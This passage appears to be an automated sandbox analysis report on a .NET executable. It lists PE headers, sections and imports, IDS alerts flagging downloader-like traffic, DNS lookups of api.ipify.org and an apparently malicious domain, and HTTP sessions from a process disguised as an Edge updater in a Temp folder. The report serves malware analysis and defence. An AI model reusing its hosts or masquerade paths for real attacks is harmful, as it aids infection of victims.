Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xD516F2F1 [Thu Apr 15 21:43:13 2083 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7dcc	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8000	0x59e	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x5e24	0x6000	598d403179444f09f90c515cbd933ec2	False	0.4288736979166667	data	5.690065301541127	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x8000	0x59e	0x600	12b4e838256486316c7b207a0b4c3129	False	0.4186197916666667	data	4.0693714937478855	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xa000	0xc	0x200	f504e33fa64904000009f5389d1c9aa7	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x80a0	0x314	data			0.4352791878172589
RT_MANIFEST	0x83b4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-11T10:17:47.071327+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49711	172.67.74.152	80	TCP
2024-10-11T10:19:15.087037+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49997	172.67.74.152	80	TCP
2024-10-11T10:19:16.384852+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49999	172.67.74.152	80	TCP
2024-10-11T10:19:18.794632+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	50001	172.67.74.152	80	TCP
2024-10-11T10:19:20.227669+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	50003	172.67.74.152	80	TCP
2024-10-11T10:19:51.090470+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	50003	172.67.74.152	80	TCP
2024-10-11T10:19:52.040269+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	50003	172.67.74.152	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 11, 2024 10:17:44.953558922 CEST	49711	80	192.168.2.6	172.67.74.152
Oct 11, 2024 10:17:44.959148884 CEST	80	49711	172.67.74.152	192.168.2.6
Oct 11, 2024 10:17:44.959218025 CEST	49711	80	192.168.2.6	172.67.74.152
Oct 11, 2024 10:17:44.960139036 CEST	49711	80	192.168.2.6	172.67.74.152
Oct 11, 2024 10:17:44.965059042 CEST	80	49711	172.67.74.152	192.168.2.6
Oct 11, 2024 10:17:45.410712004 CEST	80	49711	172.67.74.152	192.168.2.6
Oct 11, 2024 10:17:45.458738089 CEST	49712	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:17:45.458796978 CEST	443	49712	104.21.54.163	192.168.2.6
Oct 11, 2024 10:17:45.458883047 CEST	49712	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:17:45.461940050 CEST	49711	80	192.168.2.6	172.67.74.152
Oct 11, 2024 10:17:45.538279057 CEST	49712	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:17:45.538321972 CEST	443	49712	104.21.54.163	192.168.2.6
Oct 11, 2024 10:17:46.007589102 CEST	443	49712	104.21.54.163	192.168.2.6
Oct 11, 2024 10:17:46.007668018 CEST	49712	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:17:46.011624098 CEST	49712	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:17:46.011641026 CEST	443	49712	104.21.54.163	192.168.2.6
Oct 11, 2024 10:17:46.011965990 CEST	443	49712	104.21.54.163	192.168.2.6
Oct 11, 2024 10:17:46.055663109 CEST	49712	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:17:46.088956118 CEST	49712	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:17:46.131417036 CEST	443	49712	104.21.54.163	192.168.2.6
Oct 11, 2024 10:17:46.465843916 CEST	443	49712	104.21.54.163	192.168.2.6
Oct 11, 2024 10:17:46.476110935 CEST	49712	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:17:46.476130962 CEST	443	49712	104.21.54.163	192.168.2.6
Oct 11, 2024 10:17:46.774247885 CEST	443	49712	104.21.54.163	192.168.2.6
Oct 11, 2024 10:17:46.774318933 CEST	443	49712	104.21.54.163	192.168.2.6
Oct 11, 2024 10:17:46.774549961 CEST	49712	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:17:46.799056053 CEST	49712	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:17:46.919406891 CEST	49711	80	192.168.2.6	172.67.74.152
Oct 11, 2024 10:17:46.924269915 CEST	80	49711	172.67.74.152	192.168.2.6
Oct 11, 2024 10:17:47.021259069 CEST	80	49711	172.67.74.152	192.168.2.6
Oct 11, 2024 10:17:47.071326971 CEST	49711	80	192.168.2.6	172.67.74.152
Oct 11, 2024 10:17:47.119020939 CEST	49713	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:17:47.119093895 CEST	443	49713	104.21.54.163	192.168.2.6
Oct 11, 2024 10:17:47.119167089 CEST	49713	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:17:47.119568110 CEST	49713	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:17:47.119600058 CEST	443	49713	104.21.54.163	192.168.2.6
Oct 11, 2024 10:17:47.596285105 CEST	443	49713	104.21.54.163	192.168.2.6
Oct 11, 2024 10:17:47.599963903 CEST	49713	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:17:47.599997044 CEST	443	49713	104.21.54.163	192.168.2.6
Oct 11, 2024 10:17:47.740950108 CEST	443	49713	104.21.54.163	192.168.2.6
Oct 11, 2024 10:17:47.741590023 CEST	49713	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:17:47.741609097 CEST	443	49713	104.21.54.163	192.168.2.6
Oct 11, 2024 10:17:48.025903940 CEST	443	49713	104.21.54.163	192.168.2.6
Oct 11, 2024 10:17:48.025988102 CEST	443	49713	104.21.54.163	192.168.2.6
Oct 11, 2024 10:17:48.026040077 CEST	49713	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:17:48.026468039 CEST	49713	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:17:48.030746937 CEST	49715	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:17:48.030788898 CEST	443	49715	104.21.54.163	192.168.2.6
Oct 11, 2024 10:17:48.031128883 CEST	49715	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:17:48.031404972 CEST	49715	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:17:48.031424999 CEST	443	49715	104.21.54.163	192.168.2.6
Oct 11, 2024 10:17:48.487365007 CEST	443	49715	104.21.54.163	192.168.2.6
Oct 11, 2024 10:17:48.489622116 CEST	49715	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:17:48.489634037 CEST	443	49715	104.21.54.163	192.168.2.6
Oct 11, 2024 10:17:48.610863924 CEST	443	49715	104.21.54.163	192.168.2.6
Oct 11, 2024 10:17:48.611260891 CEST	49715	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:17:48.611280918 CEST	443	49715	104.21.54.163	192.168.2.6
Oct 11, 2024 10:17:48.886527061 CEST	443	49715	104.21.54.163	192.168.2.6
Oct 11, 2024 10:17:48.886609077 CEST	443	49715	104.21.54.163	192.168.2.6
Oct 11, 2024 10:17:48.886657953 CEST	49715	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:17:48.887270927 CEST	49715	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:14.306814909 CEST	49711	80	192.168.2.6	172.67.74.152
Oct 11, 2024 10:19:14.307703018 CEST	49997	80	192.168.2.6	172.67.74.152
Oct 11, 2024 10:19:14.428019047 CEST	80	49997	172.67.74.152	192.168.2.6
Oct 11, 2024 10:19:14.428121090 CEST	49997	80	192.168.2.6	172.67.74.152
Oct 11, 2024 10:19:14.428714037 CEST	49997	80	192.168.2.6	172.67.74.152
Oct 11, 2024 10:19:14.428937912 CEST	80	49711	172.67.74.152	192.168.2.6
Oct 11, 2024 10:19:14.429003954 CEST	49711	80	192.168.2.6	172.67.74.152
Oct 11, 2024 10:19:14.433670998 CEST	80	49997	172.67.74.152	192.168.2.6
Oct 11, 2024 10:19:14.913235903 CEST	80	49997	172.67.74.152	192.168.2.6
Oct 11, 2024 10:19:14.916567087 CEST	49998	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:14.916682959 CEST	443	49998	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:14.916747093 CEST	49998	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:14.917237043 CEST	49998	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:14.917278051 CEST	443	49998	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:15.087037086 CEST	49997	80	192.168.2.6	172.67.74.152
Oct 11, 2024 10:19:15.409960032 CEST	443	49998	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:15.420860052 CEST	49998	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:15.420909882 CEST	443	49998	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:15.539210081 CEST	443	49998	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:15.539762974 CEST	49998	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:15.539772987 CEST	443	49998	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:15.852204084 CEST	443	49998	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:15.852287054 CEST	443	49998	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:15.852509975 CEST	49998	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:15.853121996 CEST	49998	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:15.861869097 CEST	49997	80	192.168.2.6	172.67.74.152
Oct 11, 2024 10:19:15.862610102 CEST	49999	80	192.168.2.6	172.67.74.152
Oct 11, 2024 10:19:15.867151022 CEST	80	49997	172.67.74.152	192.168.2.6
Oct 11, 2024 10:19:15.867460966 CEST	49997	80	192.168.2.6	172.67.74.152
Oct 11, 2024 10:19:15.868347883 CEST	80	49999	172.67.74.152	192.168.2.6
Oct 11, 2024 10:19:15.869189024 CEST	49999	80	192.168.2.6	172.67.74.152
Oct 11, 2024 10:19:15.869189024 CEST	49999	80	192.168.2.6	172.67.74.152
Oct 11, 2024 10:19:15.874028921 CEST	80	49999	172.67.74.152	192.168.2.6
Oct 11, 2024 10:19:16.329766035 CEST	80	49999	172.67.74.152	192.168.2.6
Oct 11, 2024 10:19:16.332722902 CEST	50000	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:16.332772017 CEST	443	50000	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:16.332837105 CEST	50000	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:16.333185911 CEST	50000	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:16.333203077 CEST	443	50000	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:16.382491112 CEST	50000	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:16.384851933 CEST	49999	80	192.168.2.6	172.67.74.152
Oct 11, 2024 10:19:16.423399925 CEST	443	50000	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:16.807838917 CEST	443	50000	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:16.807894945 CEST	50000	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:18.160903931 CEST	49999	80	192.168.2.6	172.67.74.152
Oct 11, 2024 10:19:18.161943913 CEST	50001	80	192.168.2.6	172.67.74.152
Oct 11, 2024 10:19:18.166594028 CEST	80	49999	172.67.74.152	192.168.2.6
Oct 11, 2024 10:19:18.166893959 CEST	80	50001	172.67.74.152	192.168.2.6
Oct 11, 2024 10:19:18.167365074 CEST	50001	80	192.168.2.6	172.67.74.152
Oct 11, 2024 10:19:18.167412996 CEST	49999	80	192.168.2.6	172.67.74.152
Oct 11, 2024 10:19:18.167553902 CEST	50001	80	192.168.2.6	172.67.74.152
Oct 11, 2024 10:19:18.172338963 CEST	80	50001	172.67.74.152	192.168.2.6
Oct 11, 2024 10:19:18.647917986 CEST	80	50001	172.67.74.152	192.168.2.6
Oct 11, 2024 10:19:18.651127100 CEST	50002	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:18.651175022 CEST	443	50002	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:18.651257992 CEST	50002	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:18.651832104 CEST	50002	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:18.651850939 CEST	443	50002	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:18.794631958 CEST	50001	80	192.168.2.6	172.67.74.152
Oct 11, 2024 10:19:19.131288052 CEST	443	50002	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:19.131367922 CEST	50002	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:19.133728027 CEST	50002	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:19.133744001 CEST	443	50002	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:19.134033918 CEST	443	50002	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:19.135656118 CEST	50002	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:19.183402061 CEST	443	50002	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:19.267688036 CEST	443	50002	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:19.272845984 CEST	50002	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:19.272876978 CEST	443	50002	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:19.587543011 CEST	443	50002	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:19.587728024 CEST	443	50002	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:19.591545105 CEST	50002	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:19.592211008 CEST	50002	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:19.601239920 CEST	50001	80	192.168.2.6	172.67.74.152
Oct 11, 2024 10:19:19.602786064 CEST	50003	80	192.168.2.6	172.67.74.152
Oct 11, 2024 10:19:19.606945038 CEST	80	50001	172.67.74.152	192.168.2.6
Oct 11, 2024 10:19:19.607465029 CEST	50001	80	192.168.2.6	172.67.74.152
Oct 11, 2024 10:19:19.607654095 CEST	80	50003	172.67.74.152	192.168.2.6
Oct 11, 2024 10:19:19.607876062 CEST	50003	80	192.168.2.6	172.67.74.152
Oct 11, 2024 10:19:19.607990980 CEST	50003	80	192.168.2.6	172.67.74.152
Oct 11, 2024 10:19:19.612776041 CEST	80	50003	172.67.74.152	192.168.2.6
Oct 11, 2024 10:19:20.062844992 CEST	80	50003	172.67.74.152	192.168.2.6
Oct 11, 2024 10:19:20.066066027 CEST	50004	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:20.066113949 CEST	443	50004	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:20.066510916 CEST	50004	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:20.066745996 CEST	50004	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:20.066761971 CEST	443	50004	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:20.227669001 CEST	50003	80	192.168.2.6	172.67.74.152
Oct 11, 2024 10:19:20.548280001 CEST	443	50004	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:20.653803110 CEST	50004	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:20.653832912 CEST	443	50004	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:20.753388882 CEST	443	50004	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:20.753788948 CEST	50004	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:20.753827095 CEST	443	50004	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:21.039803028 CEST	443	50004	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:21.039891958 CEST	443	50004	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:21.039942980 CEST	50004	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:21.040517092 CEST	50004	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:21.041874886 CEST	50005	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:21.041915894 CEST	443	50005	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:21.041997910 CEST	50005	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:21.042350054 CEST	50005	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:21.042366028 CEST	443	50005	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:21.523014069 CEST	443	50005	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:21.525346041 CEST	50005	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:21.525398016 CEST	443	50005	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:21.663511038 CEST	443	50005	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:21.665443897 CEST	50005	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:21.665481091 CEST	443	50005	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:21.954025984 CEST	443	50005	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:21.954119921 CEST	443	50005	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:21.954327106 CEST	50005	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:21.955005884 CEST	50005	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:50.823052883 CEST	50003	80	192.168.2.6	172.67.74.152
Oct 11, 2024 10:19:50.828144073 CEST	80	50003	172.67.74.152	192.168.2.6
Oct 11, 2024 10:19:50.925553083 CEST	80	50003	172.67.74.152	192.168.2.6
Oct 11, 2024 10:19:50.926882029 CEST	50009	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:50.926932096 CEST	443	50009	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:50.927007914 CEST	50009	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:50.927403927 CEST	50009	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:50.927423954 CEST	443	50009	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:51.090470076 CEST	50003	80	192.168.2.6	172.67.74.152
Oct 11, 2024 10:19:51.412120104 CEST	443	50009	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:51.414298058 CEST	50009	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:51.414329052 CEST	443	50009	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:51.540787935 CEST	443	50009	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:51.541259050 CEST	50009	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:51.541274071 CEST	443	50009	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:51.886322021 CEST	443	50009	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:51.886426926 CEST	443	50009	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:51.887005091 CEST	50009	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:51.887006044 CEST	50009	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:51.887023926 CEST	443	50009	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:51.887135029 CEST	50009	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:51.892540932 CEST	50003	80	192.168.2.6	172.67.74.152
Oct 11, 2024 10:19:51.897409916 CEST	80	50003	172.67.74.152	192.168.2.6
Oct 11, 2024 10:19:51.995670080 CEST	80	50003	172.67.74.152	192.168.2.6
Oct 11, 2024 10:19:51.996865988 CEST	50010	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:51.996917963 CEST	443	50010	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:51.997178078 CEST	50010	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:51.997374058 CEST	50010	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:51.997385979 CEST	443	50010	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:52.040268898 CEST	50003	80	192.168.2.6	172.67.74.152
Oct 11, 2024 10:19:52.454410076 CEST	443	50010	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:52.456254959 CEST	50010	443	192.168.2.6	104.21.54.163
Oct 11, 2024 10:19:52.456269979 CEST	443	50010	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:52.592691898 CEST	443	50010	104.21.54.163	192.168.2.6
Oct 11, 2024 10:19:52.634047985 CEST	50010	443	192.168.2.6	104.21.54.163

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 11, 2024 10:17:44.931602955 CEST	60762	53	192.168.2.6	1.1.1.1
Oct 11, 2024 10:17:44.938674927 CEST	53	60762	1.1.1.1	192.168.2.6
Oct 11, 2024 10:17:45.418304920 CEST	61981	53	192.168.2.6	1.1.1.1
Oct 11, 2024 10:17:45.458112001 CEST	53	61981	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 11, 2024 10:17:44.931602955 CEST	192.168.2.6	1.1.1.1	0x7412	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:17:45.418304920 CEST	192.168.2.6	1.1.1.1	0x17b3	Standard query (0)	yalubluseks.eu	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 11, 2024 10:17:44.938674927 CEST	1.1.1.1	192.168.2.6	0x7412	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:17:44.938674927 CEST	1.1.1.1	192.168.2.6	0x7412	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:17:44.938674927 CEST	1.1.1.1	192.168.2.6	0x7412	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:17:45.458112001 CEST	1.1.1.1	192.168.2.6	0x17b3	No error (0)	yalubluseks.eu	104.21.54.163	A (IP address)	IN (0x0001)	false
Oct 11, 2024 10:17:45.458112001 CEST	1.1.1.1	192.168.2.6	0x17b3	No error (0)	yalubluseks.eu	172.67.140.92	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

yalubluseks.eu

api.ipify.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49711	172.67.74.152	80	4152	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:17:44.960139036 CEST	63	OUT	GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
Oct 11, 2024 10:17:45.410712004 CEST	227	IN	HTTP/1.1 200 OK Date: Fri, 11 Oct 2024 08:17:45 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8d0d6a628a037281-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33
Oct 11, 2024 10:17:46.919406891 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 11, 2024 10:17:47.021259069 CEST	227	IN	HTTP/1.1 200 OK Date: Fri, 11 Oct 2024 08:17:46 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8d0d6a6c9d687281-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49997	172.67.74.152	80	4152	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:19:14.428714037 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 11, 2024 10:19:14.913235903 CEST	227	IN	HTTP/1.1 200 OK Date: Fri, 11 Oct 2024 08:19:14 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8d0d6c91deeb7cff-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49999	172.67.74.152	80	4152	C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 10:19:15.869189024 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
